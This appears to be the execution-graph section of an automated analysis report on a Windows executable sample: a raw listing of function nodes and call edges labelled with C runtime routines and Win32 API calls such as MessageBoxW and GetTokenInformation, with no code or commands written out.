                                                            execution_graph: [raw node/edge listing of the interactive execution graph, not renderable as text. Recoverable content: function nodes in the 7ff7b10f… to 7ff7b111… address range of the sample's image, labelled with CRT routines (_get_daylight, _invalid_parameter_noinfo, __free_lconv_num, _fread_nolock, _wfindfirst32i64, __crtLCMapStringW, __FrameHandler3::FrameUnwindToEmptyState, __scrt_acquire_startup_lock) and Win32 API calls (EnterCriticalSection, LeaveCriticalSection, FlsGetValue, FlsSetValue, GetLastError, SetLastError, RtlAllocateHeap, FindFirstFileExW, GetModuleFileNameW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, SetEnvironmentVariableW, SetDllDirectoryW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryExW, GetProcAddress, FreeLibrary, OpenProcessToken, MessageBoxA, MessageBoxW, SetConsoleCtrlHandler, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess)]
16905 7ff7b10f6ad4 16905->16903 16906 7ff7b10f4040 49 API calls 16905->16906 16907 7ff7b10f6b35 16906->16907 16908 7ff7b10f2b10 59 API calls 16907->16908 16909 7ff7b10f6ba5 __std_exception_copy memcpy_s 16907->16909 16908->16903 16909->16615 16923 7ff7b10f660a memcpy_s 16910->16923 16912 7ff7b10f672f 16914 7ff7b10f4040 49 API calls 16912->16914 16913 7ff7b10f674b 16915 7ff7b10f2b10 59 API calls 16913->16915 16916 7ff7b10f67a8 16914->16916 16921 7ff7b10f6741 __std_exception_copy 16915->16921 16919 7ff7b10f4040 49 API calls 16916->16919 16917 7ff7b10f4040 49 API calls 16917->16923 16918 7ff7b10f6710 16918->16912 16922 7ff7b10f4040 49 API calls 16918->16922 16920 7ff7b10f67d8 16919->16920 16926 7ff7b10f4040 49 API calls 16920->16926 16924 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16921->16924 16922->16912 16923->16912 16923->16913 16923->16917 16923->16918 16923->16923 16927 7ff7b10f1700 135 API calls 16923->16927 16928 7ff7b10f6731 16923->16928 19035 7ff7b10f1940 16923->19035 16925 7ff7b10f3c06 16924->16925 16925->16626 16930 7ff7b10f6570 16925->16930 16926->16921 16927->16923 16929 7ff7b10f2b10 59 API calls 16928->16929 16929->16921 19039 7ff7b10f8260 16930->19039 16932 7ff7b10f658c 16933 7ff7b10f8260 58 API calls 16932->16933 16934 7ff7b10f659f 16933->16934 16935 7ff7b10f65d5 16934->16935 16936 7ff7b10f65b7 16934->16936 16937 7ff7b10f2b10 59 API calls 16935->16937 19043 7ff7b10f6ef0 GetProcAddress 16936->19043 16939 7ff7b10f3c14 16937->16939 16939->16626 16939->16634 16941 7ff7b10f6c54 16940->16941 16942 7ff7b10f2b10 59 API calls 16941->16942 16945 7ff7b10f6cca 16941->16945 16943 7ff7b10f6cae 16942->16943 16944 7ff7b10f6840 FreeLibrary 16943->16944 16944->16945 16945->16640 16947 7ff7b10f1f05 16946->16947 16948 7ff7b11050a4 49 API calls 16947->16948 16949 7ff7b10f1f28 16948->16949 16949->16631 19102 7ff7b10f5bc0 16950->19102 16953 7ff7b10f348d 16953->16639 16955 7ff7b10f3464 16955->16953 19171 7ff7b10f5920 16955->19171 16957 7ff7b10f3470 16957->16953 19180 
7ff7b10f5a90 16957->19180 17003 7ff7b10fbda0 16984->17003 16987 7ff7b10f2a09 17005 7ff7b11050a4 16987->17005 16992 7ff7b10f1ee0 49 API calls 16993 7ff7b10f2a66 memcpy_s 16992->16993 16994 7ff7b10f8bd0 54 API calls 16993->16994 16995 7ff7b10f2a9b 16994->16995 16996 7ff7b10f2aa0 16995->16996 16997 7ff7b10f2ad8 MessageBoxA 16995->16997 16998 7ff7b10f8bd0 54 API calls 16996->16998 16999 7ff7b10f2af2 16997->16999 17000 7ff7b10f2aba MessageBoxW 16998->17000 17001 7ff7b10fbe00 _wfindfirst32i64 8 API calls 16999->17001 17000->16999 17002 7ff7b10f2b02 17001->17002 17002->16703 17004 7ff7b10f29dc GetLastError 17003->17004 17004->16987 17008 7ff7b11050fe 17005->17008 17006 7ff7b1105123 17009 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17006->17009 17007 7ff7b110515f 17035 7ff7b1103330 17007->17035 17008->17006 17008->17007 17011 7ff7b110514d 17009->17011 17013 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17011->17013 17012 7ff7b1105208 17020 7ff7b1105211 17012->17020 17021 7ff7b110523c 17012->17021 17016 7ff7b10f2a37 17013->17016 17014 7ff7b110b4ec __free_lconv_num 11 API calls 17014->17011 17023 7ff7b10f8560 17016->17023 17017 7ff7b1105260 17018 7ff7b110526a 17017->17018 17017->17021 17022 7ff7b110b4ec __free_lconv_num 11 API calls 17018->17022 17019 7ff7b110b4ec __free_lconv_num 11 API calls 17019->17011 17020->17019 17021->17014 17022->17011 17024 7ff7b10f856c 17023->17024 17025 7ff7b10f858d FormatMessageW 17024->17025 17026 7ff7b10f8587 GetLastError 17024->17026 17027 7ff7b10f85c0 17025->17027 17028 7ff7b10f85dc WideCharToMultiByte 17025->17028 17026->17025 17029 7ff7b10f29c0 54 API calls 17027->17029 17030 7ff7b10f8616 17028->17030 17031 7ff7b10f85d3 17028->17031 17029->17031 17032 7ff7b10f29c0 54 API calls 17030->17032 17033 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17031->17033 17032->17031 17034 7ff7b10f2a3e 17033->17034 17034->16992 17036 7ff7b110336e 17035->17036 17037 7ff7b110335e 17035->17037 17038 7ff7b1103377 17036->17038 17042 7ff7b11033a5 17036->17042 
17039 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17037->17039 17040 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17038->17040 17041 7ff7b110339d 17039->17041 17040->17041 17041->17012 17041->17017 17041->17020 17041->17021 17042->17037 17042->17041 17045 7ff7b1103654 17042->17045 17049 7ff7b1103cc0 17042->17049 17075 7ff7b1103988 17042->17075 17105 7ff7b1103210 17042->17105 17108 7ff7b1104ee0 17042->17108 17047 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17045->17047 17047->17037 17050 7ff7b1103d75 17049->17050 17051 7ff7b1103d02 17049->17051 17054 7ff7b1103dcf 17050->17054 17055 7ff7b1103d7a 17050->17055 17052 7ff7b1103d9f 17051->17052 17053 7ff7b1103d08 17051->17053 17132 7ff7b1102270 17052->17132 17056 7ff7b1103dde 17053->17056 17059 7ff7b1103d0d 17053->17059 17054->17052 17054->17056 17073 7ff7b1103d38 17054->17073 17057 7ff7b1103daf 17055->17057 17058 7ff7b1103d7c 17055->17058 17074 7ff7b1103e0d 17056->17074 17146 7ff7b1102680 17056->17146 17139 7ff7b1101e60 17057->17139 17063 7ff7b1103d8b 17058->17063 17066 7ff7b1103d1d 17058->17066 17064 7ff7b1103d50 17059->17064 17059->17066 17059->17073 17063->17052 17067 7ff7b1103d90 17063->17067 17064->17074 17124 7ff7b1104ae0 17064->17124 17066->17074 17114 7ff7b1104624 17066->17114 17067->17074 17128 7ff7b1104c78 17067->17128 17069 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17071 7ff7b11040a3 17069->17071 17071->17042 17073->17074 17153 7ff7b110f3f8 17073->17153 17074->17069 17076 7ff7b1103993 17075->17076 17077 7ff7b11039a9 17075->17077 17078 7ff7b11039e7 17076->17078 17080 7ff7b1103d75 17076->17080 17081 7ff7b1103d02 17076->17081 17077->17078 17079 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17077->17079 17078->17042 17079->17078 17084 7ff7b1103dcf 17080->17084 17085 7ff7b1103d7a 17080->17085 17082 7ff7b1103d9f 17081->17082 17083 7ff7b1103d08 17081->17083 17086 7ff7b1102270 38 API calls 17082->17086 17087 7ff7b1103d0d 17083->17087 17090 7ff7b1103dde 17083->17090 17084->17082 
17084->17090 17103 7ff7b1103d38 17084->17103 17088 7ff7b1103daf 17085->17088 17091 7ff7b1103d7c 17085->17091 17086->17103 17093 7ff7b1103d50 17087->17093 17096 7ff7b1103d1d 17087->17096 17087->17103 17092 7ff7b1101e60 38 API calls 17088->17092 17089 7ff7b1104624 47 API calls 17089->17103 17094 7ff7b1102680 38 API calls 17090->17094 17104 7ff7b1103e0d 17090->17104 17095 7ff7b1103d8b 17091->17095 17091->17096 17092->17103 17097 7ff7b1104ae0 47 API calls 17093->17097 17093->17104 17094->17103 17095->17082 17098 7ff7b1103d90 17095->17098 17096->17089 17096->17104 17097->17103 17100 7ff7b1104c78 37 API calls 17098->17100 17098->17104 17099 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17101 7ff7b11040a3 17099->17101 17100->17103 17101->17042 17102 7ff7b110f3f8 47 API calls 17102->17103 17103->17102 17103->17104 17104->17099 17302 7ff7b1101434 17105->17302 17109 7ff7b1104ef7 17108->17109 17319 7ff7b110e558 17109->17319 17115 7ff7b1104646 17114->17115 17163 7ff7b11012a0 17115->17163 17120 7ff7b1104783 17122 7ff7b1104ee0 45 API calls 17120->17122 17123 7ff7b110480c 17120->17123 17121 7ff7b1104ee0 45 API calls 17121->17120 17122->17123 17123->17073 17125 7ff7b1104af8 17124->17125 17127 7ff7b1104b60 17124->17127 17126 7ff7b110f3f8 47 API calls 17125->17126 17125->17127 17126->17127 17127->17073 17131 7ff7b1104c99 17128->17131 17129 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17130 7ff7b1104cca 17129->17130 17130->17073 17131->17129 17131->17130 17134 7ff7b11022a3 17132->17134 17133 7ff7b11022d2 17135 7ff7b11012a0 12 API calls 17133->17135 17138 7ff7b110230f 17133->17138 17134->17133 17136 7ff7b110238f 17134->17136 17135->17138 17137 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17136->17137 17137->17138 17138->17073 17140 7ff7b1101e93 17139->17140 17141 7ff7b1101ec2 17140->17141 17143 7ff7b1101f7f 17140->17143 17142 7ff7b11012a0 12 API calls 17141->17142 17145 7ff7b1101eff 17141->17145 17142->17145 17144 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 
17143->17144 17144->17145 17145->17073 17147 7ff7b11026b3 17146->17147 17148 7ff7b11026e2 17147->17148 17150 7ff7b110279f 17147->17150 17149 7ff7b11012a0 12 API calls 17148->17149 17152 7ff7b110271f 17148->17152 17149->17152 17151 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17150->17151 17151->17152 17152->17073 17154 7ff7b110f420 17153->17154 17155 7ff7b110f465 17154->17155 17156 7ff7b1104ee0 45 API calls 17154->17156 17159 7ff7b110f425 memcpy_s 17154->17159 17162 7ff7b110f44e memcpy_s 17154->17162 17155->17159 17155->17162 17299 7ff7b1110aa8 17155->17299 17156->17155 17157 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17157->17159 17159->17073 17162->17157 17162->17159 17164 7ff7b11012d7 17163->17164 17165 7ff7b11012c6 17163->17165 17164->17165 17166 7ff7b110e19c _fread_nolock 12 API calls 17164->17166 17171 7ff7b110f110 17165->17171 17167 7ff7b1101304 17166->17167 17168 7ff7b1101318 17167->17168 17169 7ff7b110b4ec __free_lconv_num 11 API calls 17167->17169 17170 7ff7b110b4ec __free_lconv_num 11 API calls 17168->17170 17169->17168 17170->17165 17172 7ff7b110f12d 17171->17172 17173 7ff7b110f160 17171->17173 17174 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17172->17174 17173->17172 17175 7ff7b110f192 17173->17175 17184 7ff7b1104761 17174->17184 17182 7ff7b110f2a5 17175->17182 17188 7ff7b110f1da 17175->17188 17176 7ff7b110f397 17226 7ff7b110e5fc 17176->17226 17178 7ff7b110f35d 17219 7ff7b110e994 17178->17219 17180 7ff7b110f32c 17212 7ff7b110ec74 17180->17212 17182->17176 17182->17178 17182->17180 17183 7ff7b110f2ef 17182->17183 17186 7ff7b110f2e5 17182->17186 17202 7ff7b110eea4 17183->17202 17184->17120 17184->17121 17186->17178 17187 7ff7b110f2ea 17186->17187 17187->17180 17187->17183 17188->17184 17193 7ff7b110b01c 17188->17193 17191 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17192 7ff7b110f3f4 17191->17192 17195 7ff7b110b029 17193->17195 17197 7ff7b110b033 17193->17197 17194 7ff7b1105aa4 _get_daylight 11 API calls 17196 7ff7b110b03a 
17194->17196 17195->17197 17200 7ff7b110b04e 17195->17200 17198 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17196->17198 17197->17194 17199 7ff7b110b046 17198->17199 17199->17184 17199->17191 17200->17199 17201 7ff7b1105aa4 _get_daylight 11 API calls 17200->17201 17201->17196 17235 7ff7b1114cfc 17202->17235 17206 7ff7b110ef4c 17207 7ff7b110efa1 17206->17207 17209 7ff7b110ef6c 17206->17209 17211 7ff7b110ef50 17206->17211 17288 7ff7b110ea90 17207->17288 17284 7ff7b110ed4c 17209->17284 17211->17184 17213 7ff7b1114cfc 38 API calls 17212->17213 17214 7ff7b110ecbe 17213->17214 17215 7ff7b1114744 37 API calls 17214->17215 17216 7ff7b110ed0e 17215->17216 17217 7ff7b110ed12 17216->17217 17218 7ff7b110ed4c 45 API calls 17216->17218 17217->17184 17218->17217 17220 7ff7b1114cfc 38 API calls 17219->17220 17221 7ff7b110e9df 17220->17221 17222 7ff7b1114744 37 API calls 17221->17222 17223 7ff7b110ea37 17222->17223 17224 7ff7b110ea3b 17223->17224 17225 7ff7b110ea90 45 API calls 17223->17225 17224->17184 17225->17224 17227 7ff7b110e641 17226->17227 17228 7ff7b110e674 17226->17228 17229 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17227->17229 17230 7ff7b110e68c 17228->17230 17232 7ff7b110e70d 17228->17232 17234 7ff7b110e66d memcpy_s 17229->17234 17231 7ff7b110e994 46 API calls 17230->17231 17231->17234 17233 7ff7b1104ee0 45 API calls 17232->17233 17232->17234 17233->17234 17234->17184 17236 7ff7b1114d4f fegetenv 17235->17236 17237 7ff7b1118c5c 37 API calls 17236->17237 17241 7ff7b1114da2 17237->17241 17238 7ff7b1114e92 17240 7ff7b1118c5c 37 API calls 17238->17240 17239 7ff7b1114dcf 17243 7ff7b110b01c __std_exception_copy 37 API calls 17239->17243 17242 7ff7b1114ebc 17240->17242 17241->17238 17244 7ff7b1114dbd 17241->17244 17245 7ff7b1114e6c 17241->17245 17246 7ff7b1118c5c 37 API calls 17242->17246 17247 7ff7b1114e4d 17243->17247 17244->17238 17244->17239 17249 7ff7b110b01c __std_exception_copy 37 API calls 17245->17249 17250 7ff7b1114ecd 17246->17250 17248 
7ff7b1115f74 17247->17248 17255 7ff7b1114e55 17247->17255 17251 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17248->17251 17249->17247 17252 7ff7b1118e50 20 API calls 17250->17252 17253 7ff7b1115f89 17251->17253 17262 7ff7b1114f36 memcpy_s 17252->17262 17254 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17256 7ff7b110eef1 17254->17256 17255->17254 17280 7ff7b1114744 17256->17280 17257 7ff7b11152df memcpy_s 17258 7ff7b1114f77 memcpy_s 17266 7ff7b11158bb memcpy_s 17258->17266 17267 7ff7b11153d3 memcpy_s 17258->17267 17259 7ff7b111561f 17260 7ff7b1114860 37 API calls 17259->17260 17269 7ff7b1115d37 17260->17269 17261 7ff7b11155cb 17261->17259 17264 7ff7b1115f8c memcpy_s 37 API calls 17261->17264 17262->17257 17262->17258 17265 7ff7b1105aa4 _get_daylight 11 API calls 17262->17265 17263 7ff7b1115d92 17271 7ff7b1115f18 17263->17271 17276 7ff7b1114860 37 API calls 17263->17276 17278 7ff7b1115f8c memcpy_s 37 API calls 17263->17278 17264->17259 17268 7ff7b11153b0 17265->17268 17266->17259 17266->17261 17273 7ff7b1105aa4 11 API calls _get_daylight 17266->17273 17279 7ff7b110b484 37 API calls _invalid_parameter_noinfo 17266->17279 17267->17261 17274 7ff7b1105aa4 11 API calls _get_daylight 17267->17274 17277 7ff7b110b484 37 API calls _invalid_parameter_noinfo 17267->17277 17270 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17268->17270 17269->17263 17272 7ff7b1115f8c memcpy_s 37 API calls 17269->17272 17270->17258 17275 7ff7b1118c5c 37 API calls 17271->17275 17272->17263 17273->17266 17274->17267 17275->17255 17276->17263 17277->17267 17278->17263 17279->17266 17281 7ff7b1114763 17280->17281 17282 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17281->17282 17283 7ff7b111478e memcpy_s 17281->17283 17282->17283 17283->17206 17286 7ff7b110ed78 memcpy_s 17284->17286 17285 7ff7b110ee32 memcpy_s 17285->17211 17286->17285 17287 7ff7b1104ee0 45 API calls 17286->17287 17287->17285 17289 7ff7b110eacb 17288->17289 17293 7ff7b110eb18 memcpy_s 17288->17293 17290 7ff7b110b3b8 
_invalid_parameter_noinfo 37 API calls 17289->17290 17291 7ff7b110eaf7 17290->17291 17291->17211 17292 7ff7b110eb83 17294 7ff7b110b01c __std_exception_copy 37 API calls 17292->17294 17293->17292 17295 7ff7b1104ee0 45 API calls 17293->17295 17298 7ff7b110ebc5 memcpy_s 17294->17298 17295->17292 17296 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17297 7ff7b110ec70 17296->17297 17298->17296 17301 7ff7b1110acc WideCharToMultiByte 17299->17301 17303 7ff7b1101473 17302->17303 17304 7ff7b1101461 17302->17304 17307 7ff7b1101480 17303->17307 17310 7ff7b11014bd 17303->17310 17305 7ff7b1105aa4 _get_daylight 11 API calls 17304->17305 17306 7ff7b1101466 17305->17306 17308 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17306->17308 17309 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17307->17309 17316 7ff7b1101471 17308->17316 17309->17316 17311 7ff7b1101566 17310->17311 17313 7ff7b1105aa4 _get_daylight 11 API calls 17310->17313 17312 7ff7b1105aa4 _get_daylight 11 API calls 17311->17312 17311->17316 17315 7ff7b1101610 17312->17315 17314 7ff7b110155b 17313->17314 17317 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17314->17317 17318 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17315->17318 17316->17042 17317->17311 17318->17316 17320 7ff7b1104f1f 17319->17320 17321 7ff7b110e571 17319->17321 17323 7ff7b110e5c4 17320->17323 17321->17320 17327 7ff7b1113f54 17321->17327 17324 7ff7b110e5dd 17323->17324 17326 7ff7b1104f2f 17323->17326 17324->17326 17340 7ff7b11132a0 17324->17340 17326->17042 17328 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17327->17328 17329 7ff7b1113f63 17328->17329 17330 7ff7b1113fae 17329->17330 17339 7ff7b1111298 EnterCriticalSection 17329->17339 17330->17320 17341 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17340->17341 17342 7ff7b11132a9 17341->17342 17350 7ff7b110594c EnterCriticalSection 17343->17350 17352 7ff7b10f288c 17351->17352 17353 7ff7b11050a4 49 API calls 17352->17353 17354 7ff7b10f28dd 
17353->17354 17355 7ff7b1105aa4 _get_daylight 11 API calls 17354->17355 17356 7ff7b10f28e2 17355->17356 17370 7ff7b1105ac4 17356->17370 17359 7ff7b10f1ee0 49 API calls 17360 7ff7b10f2911 memcpy_s 17359->17360 17361 7ff7b10f8bd0 57 API calls 17360->17361 17362 7ff7b10f2946 17361->17362 17363 7ff7b10f2983 MessageBoxA 17362->17363 17364 7ff7b10f294b 17362->17364 17366 7ff7b10f299d 17363->17366 17365 7ff7b10f8bd0 57 API calls 17364->17365 17367 7ff7b10f2965 MessageBoxW 17365->17367 17368 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17366->17368 17367->17366 17369 7ff7b10f29ad 17368->17369 17369->16713 17371 7ff7b110be68 _get_daylight 11 API calls 17370->17371 17372 7ff7b1105adb 17371->17372 17373 7ff7b10f28e9 17372->17373 17374 7ff7b110f738 _get_daylight 11 API calls 17372->17374 17376 7ff7b1105b1b 17372->17376 17373->17359 17375 7ff7b1105b10 17374->17375 17377 7ff7b110b4ec __free_lconv_num 11 API calls 17375->17377 17376->17373 17382 7ff7b110fe08 17376->17382 17377->17376 17380 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17381 7ff7b1105b60 17380->17381 17387 7ff7b110fe25 17382->17387 17383 7ff7b110fe2a 17384 7ff7b1105b41 17383->17384 17385 7ff7b1105aa4 _get_daylight 11 API calls 17383->17385 17384->17373 17384->17380 17386 7ff7b110fe34 17385->17386 17388 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17386->17388 17387->17383 17387->17384 17389 7ff7b110fe74 17387->17389 17388->17384 17389->17384 17390 7ff7b1105aa4 _get_daylight 11 API calls 17389->17390 17390->17386 17392 7ff7b10f8d04 WideCharToMultiByte 17391->17392 17393 7ff7b10f8d72 WideCharToMultiByte 17391->17393 17396 7ff7b10f8d45 17392->17396 17397 7ff7b10f8d2e 17392->17397 17394 7ff7b10f3f15 17393->17394 17395 7ff7b10f8d9f 17393->17395 17394->16722 17394->16724 17398 7ff7b10f29c0 57 API calls 17395->17398 17396->17393 17400 7ff7b10f8d5b 17396->17400 17399 7ff7b10f29c0 57 API calls 17397->17399 17398->17394 17399->17394 17401 7ff7b10f29c0 57 API calls 17400->17401 17401->17394 17403 7ff7b10f7bde 17402->17403 
17404 7ff7b110af93 17402->17404 17403->16740 17404->17403 17405 7ff7b110b01c __std_exception_copy 37 API calls 17404->17405 17406 7ff7b110afc0 17405->17406 17406->17403 17407 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17406->17407 17408 7ff7b110aff0 17407->17408 17410 7ff7b10f3fc0 116 API calls 17409->17410 17411 7ff7b10f1ac6 17410->17411 17412 7ff7b10f82b0 83 API calls 17411->17412 17419 7ff7b10f1c74 17411->17419 17414 7ff7b10f1afe 17412->17414 17413 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17415 7ff7b10f1c88 17413->17415 17441 7ff7b10f1b2f 17414->17441 17448 7ff7b1100df4 17414->17448 17415->16760 17442 7ff7b10f3e30 17415->17442 17417 7ff7b110076c 74 API calls 17417->17419 17418 7ff7b10f1b18 17420 7ff7b10f1b34 17418->17420 17421 7ff7b10f1b1c 17418->17421 17419->17413 17452 7ff7b1100abc 17420->17452 17422 7ff7b10f2870 59 API calls 17421->17422 17422->17441 17425 7ff7b10f1b4f 17428 7ff7b10f2870 59 API calls 17425->17428 17426 7ff7b10f1b67 17427 7ff7b1100df4 73 API calls 17426->17427 17429 7ff7b10f1bb4 17427->17429 17428->17441 17430 7ff7b10f1bc6 17429->17430 17431 7ff7b10f1bde 17429->17431 17432 7ff7b10f2870 59 API calls 17430->17432 17433 7ff7b1100abc _fread_nolock 53 API calls 17431->17433 17432->17441 17434 7ff7b10f1bf3 17433->17434 17435 7ff7b10f1c0e 17434->17435 17436 7ff7b10f1bf9 17434->17436 17455 7ff7b1100830 17435->17455 17438 7ff7b10f2870 59 API calls 17436->17438 17438->17441 17440 7ff7b10f2b10 59 API calls 17440->17441 17441->17417 17443 7ff7b10f1ee0 49 API calls 17442->17443 17444 7ff7b10f3e4d 17443->17444 17444->16759 17446 7ff7b10f1ee0 49 API calls 17445->17446 17447 7ff7b10f4070 17446->17447 17447->16760 17449 7ff7b1100e24 17448->17449 17461 7ff7b1100b84 17449->17461 17451 7ff7b1100e3d 17451->17418 17473 7ff7b1100adc 17452->17473 17456 7ff7b1100839 17455->17456 17457 7ff7b10f1c22 17455->17457 17458 7ff7b1105aa4 _get_daylight 11 API calls 17456->17458 17457->17440 17457->17441 17459 7ff7b110083e 17458->17459 17460 7ff7b110b484 
_invalid_parameter_noinfo 37 API calls 17459->17460 17460->17457 17462 7ff7b1100bee 17461->17462 17463 7ff7b1100bae 17461->17463 17462->17463 17465 7ff7b1100bfa 17462->17465 17464 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17463->17464 17471 7ff7b1100bd5 17464->17471 17472 7ff7b110594c EnterCriticalSection 17465->17472 17471->17451 17474 7ff7b1100b06 17473->17474 17485 7ff7b10f1b49 17473->17485 17475 7ff7b1100b15 memcpy_s 17474->17475 17476 7ff7b1100b52 17474->17476 17474->17485 17478 7ff7b1105aa4 _get_daylight 11 API calls 17475->17478 17486 7ff7b110594c EnterCriticalSection 17476->17486 17480 7ff7b1100b2a 17478->17480 17482 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 17480->17482 17482->17485 17485->17425 17485->17426 17488 7ff7b10f868f GetTokenInformation 17487->17488 17491 7ff7b10f8711 __std_exception_copy 17487->17491 17489 7ff7b10f86b0 GetLastError 17488->17489 17490 7ff7b10f86bb 17488->17490 17489->17490 17489->17491 17490->17491 17494 7ff7b10f86d7 GetTokenInformation 17490->17494 17492 7ff7b10f8724 CloseHandle 17491->17492 17493 7ff7b10f872a 17491->17493 17492->17493 17493->16769 17494->17491 17495 7ff7b10f86fa 17494->17495 17495->17491 17496 7ff7b10f8704 ConvertSidToStringSidW 17495->17496 17496->17491 17498 7ff7b10f8765 17497->17498 17514 7ff7b11052f8 17498->17514 17502 7ff7b10f2c50 17501->17502 17503 7ff7b11050a4 49 API calls 17502->17503 17504 7ff7b10f2c9b memcpy_s 17503->17504 17505 7ff7b10f8bd0 57 API calls 17504->17505 17506 7ff7b10f2cd0 17505->17506 17507 7ff7b10f2cd5 17506->17507 17508 7ff7b10f2d0d MessageBoxA 17506->17508 17510 7ff7b10f8bd0 57 API calls 17507->17510 17509 7ff7b10f2d27 17508->17509 17512 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17509->17512 17511 7ff7b10f2cef MessageBoxW 17510->17511 17511->17509 17513 7ff7b10f2d37 17512->17513 17513->16779 17515 7ff7b1105352 17514->17515 17516 7ff7b1105377 17515->17516 17518 7ff7b11053b3 17515->17518 17517 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17516->17517 17521 
7ff7b11053a1 17517->17521 17532 7ff7b11036b0 17518->17532 17520 7ff7b1105494 17523 7ff7b110b4ec __free_lconv_num 11 API calls 17520->17523 17522 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17521->17522 17525 7ff7b10f8788 17522->17525 17523->17521 17525->16776 17526 7ff7b11054ba 17526->17520 17529 7ff7b11054c4 17526->17529 17527 7ff7b1105469 17530 7ff7b110b4ec __free_lconv_num 11 API calls 17527->17530 17528 7ff7b1105460 17528->17520 17528->17527 17531 7ff7b110b4ec __free_lconv_num 11 API calls 17529->17531 17530->17521 17531->17521 17533 7ff7b11036ee 17532->17533 17534 7ff7b11036de 17532->17534 17535 7ff7b11036f7 17533->17535 17539 7ff7b1103725 17533->17539 17536 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17534->17536 17537 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17535->17537 17538 7ff7b110371d 17536->17538 17537->17538 17538->17520 17538->17526 17538->17527 17538->17528 17539->17534 17539->17538 17543 7ff7b11040c4 17539->17543 17576 7ff7b1103b10 17539->17576 17613 7ff7b11032a0 17539->17613 17544 7ff7b1104106 17543->17544 17545 7ff7b1104177 17543->17545 17546 7ff7b11041a1 17544->17546 17547 7ff7b110410c 17544->17547 17548 7ff7b11041d0 17545->17548 17549 7ff7b110417c 17545->17549 17632 7ff7b1102474 17546->17632 17550 7ff7b1104111 17547->17550 17551 7ff7b1104140 17547->17551 17554 7ff7b11041df 17548->17554 17556 7ff7b11041e7 17548->17556 17557 7ff7b11041da 17548->17557 17552 7ff7b11041b1 17549->17552 17553 7ff7b110417e 17549->17553 17550->17556 17558 7ff7b1104117 17550->17558 17551->17554 17551->17558 17639 7ff7b1102064 17552->17639 17563 7ff7b1104120 17553->17563 17565 7ff7b110418d 17553->17565 17574 7ff7b1104210 17554->17574 17650 7ff7b1102884 17554->17650 17646 7ff7b1104dcc 17556->17646 17557->17546 17557->17554 17558->17563 17564 7ff7b1104152 17558->17564 17572 7ff7b110413b 17558->17572 17563->17574 17616 7ff7b1104878 17563->17616 17564->17574 17626 7ff7b1104bb4 17564->17626 17565->17546 17567 7ff7b1104192 17565->17567 17570 7ff7b1104c78 37 API 
calls 17567->17570 17567->17574 17568 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17569 7ff7b110450a 17568->17569 17569->17539 17570->17572 17571 7ff7b1104ee0 45 API calls 17575 7ff7b11043fc 17571->17575 17572->17571 17572->17574 17572->17575 17574->17568 17575->17574 17657 7ff7b110f5a8 17575->17657 17577 7ff7b1103b34 17576->17577 17578 7ff7b1103b1e 17576->17578 17579 7ff7b1103b74 17577->17579 17582 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 17577->17582 17578->17579 17580 7ff7b1104106 17578->17580 17581 7ff7b1104177 17578->17581 17579->17539 17583 7ff7b11041a1 17580->17583 17584 7ff7b110410c 17580->17584 17585 7ff7b11041d0 17581->17585 17586 7ff7b110417c 17581->17586 17582->17579 17591 7ff7b1102474 38 API calls 17583->17591 17587 7ff7b1104111 17584->17587 17588 7ff7b1104140 17584->17588 17592 7ff7b11041e7 17585->17592 17594 7ff7b11041da 17585->17594 17598 7ff7b11041df 17585->17598 17589 7ff7b11041b1 17586->17589 17590 7ff7b110417e 17586->17590 17587->17592 17595 7ff7b1104117 17587->17595 17588->17595 17588->17598 17596 7ff7b1102064 38 API calls 17589->17596 17593 7ff7b1104120 17590->17593 17602 7ff7b110418d 17590->17602 17609 7ff7b110413b 17591->17609 17599 7ff7b1104dcc 45 API calls 17592->17599 17597 7ff7b1104878 47 API calls 17593->17597 17612 7ff7b1104210 17593->17612 17594->17583 17594->17598 17595->17593 17600 7ff7b1104152 17595->17600 